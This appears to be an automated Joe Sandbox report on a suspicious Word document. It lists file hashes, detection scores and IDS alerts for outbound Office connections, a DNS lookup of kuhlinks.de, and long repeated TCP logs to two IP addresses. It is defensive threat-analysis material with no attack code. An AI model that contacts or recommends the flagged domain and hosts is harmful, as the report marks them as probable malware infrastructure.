Edit tour

Windows Analysis Report
IMP 7527518303 2507294.docx.doc

Overview

General Information

Sample name:	IMP 7527518303 2507294.docx.doc
Analysis ID:	1654507
MD5:	c8675988aa2bc47338861b4d62aa517d
SHA1:	67366589c5fbfa1153aa10a3d06b88d12719cdca
SHA256:	315b8754f30097fb04f76e09719a8415c53103a8c8abd6c7e988a918a2791476
Tags:	docuser-lowmal3
Infos:

Detection

Score:	60
Range:	0 - 100
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Contains an external reference to another file

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Sigma detected: Suspicious Office Outbound Connections

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w11x64_office

WINWORD.EXE (PID: 7312 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: A9F0EC89897AC6C878D217DFB64CA752)

cleanup

Sigma Signatures

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.24, DestinationIsIpv6: false, DestinationPort: 60832, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 7312, Protocol: tcp, SourceIp: 172.67.144.140, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

Joe Security ANOMALY Microsoft Office HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-02T12:00:42.919911+0200	1810004	1	Potentially Bad Traffic	192.168.2.24	60838	172.67.144.140	443	TCP
2025-04-02T12:00:43.414685+0200	1810004	1	Potentially Bad Traffic	192.168.2.24	60840	216.9.224.185	80	TCP

Joe Security ANOMALY Microsoft Office WebDAV Discovery

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-02T12:00:40.599604+0200	1810005	1	Potentially Bad Traffic	192.168.2.24	60833	172.67.144.140	443	TCP

Joe Sandbox Signatures

• AV Detection
• Compliance
• Software Vulnerabilities
• Networking
• System Summary
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: IMP 7527518303 2507294.docx.doc	Virustotal: Detection: 13%			Perma Link
Source: IMP 7527518303 2507294.docx.doc	ReversingLabs: Detection: 16%

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 172.67.144.140:443 -> 192.168.2.24:60832 version: TLS 1.2

Source: global traffic	DNS query: name: kuhlinks.de
Source: global traffic	DNS query: name: 185.224.9.216.in-addr.arpa

Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443

Source: global traffic	TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global traffic	TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global traffic	TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global traffic	TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global traffic	TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic	TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global traffic	TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global traffic	TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global traffic	TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global traffic	TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global traffic	TCP traffic: 192.168.2.24:60836 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60836
Source: global traffic	TCP traffic: 192.168.2.24:60836 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60836 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60836
Source: global traffic	TCP traffic: 192.168.2.24:60836 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic	TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60836
Source: global traffic	TCP traffic: 192.168.2.24:60836 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60836 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60836
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810004 - Severity 1 - Joe Security ANOMALY Microsoft Office HTTP activity : 192.168.2.24:60840 -> 216.9.224.185:80
Source: Network traffic	Suricata IDS: 1810004 - Severity 1 - Joe Security ANOMALY Microsoft Office HTTP activity : 192.168.2.24:60838 -> 172.67.144.140:443
Source: Network traffic	Suricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.24:60833 -> 172.67.144.140:443

Source: Joe Sandbox View

ASN Name: ATT-INTERNET4US ATT-INTERNET4US

Source: Joe Sandbox View

JA3 fingerprint: 258a5a1e95b8a911872bae9081526644

